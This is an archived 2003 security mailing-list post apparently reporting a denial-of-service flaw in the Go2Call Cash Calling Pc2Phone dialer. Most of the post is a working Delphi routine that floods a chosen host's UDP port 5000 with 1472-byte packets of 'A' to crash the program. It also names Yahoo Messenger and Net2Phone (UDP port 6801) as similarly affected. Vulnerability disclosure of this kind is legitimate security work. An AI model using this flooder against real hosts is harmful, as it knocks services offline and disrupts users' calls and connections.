|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Go2Call Cash Calling vulnerable
From: Dima (megapolus
hotbox.ru)
Date: Mon Sep 01 2003 - 12:34:21 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi, sorry fo my english.
I found some bug in programm Go2Call Cash Calling
It's dialer for talking from Internet Pc2Phone
If you send a little UDP packets with size 1500 bytes
for example 1472 chars 'A' on 5000 port then this prog
will doesn't work
The exploit is very easy
a part of code on Delphi
procedure TForm1.Button1Click(Sender: TObject);
var C:string;
N:integer;
MyStream:TMemoryStream;
begin
Memo1.Lines.Add('start');
C:=Edit3.Text; //for example 'AAAA...' 1472 char 'A' for certain
N:=strtoint(Edit4.Text);
NMUDP1.RemoteHost:=Edit1.Text;
NMUDP1.RemotePort:=strtoint(Edit2.Text);
MyStream:=TMemoryStream.Create;
try
MyStream.Write(C[1],Length(C));
for n:=1 to N do
begin
NMUDP1.SendStream(MyStream);
end;
finally
MyStream.Free;
end;
Memo1.Lines.Add('finish');
end;
Yahoo messenger for example lost connection afte so ataks and 5000 UDP
port too
Net2Phone dialer pc2phone (likely Go2Call dialer) will have sound noize in
your headphone, 6801 UDP port
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]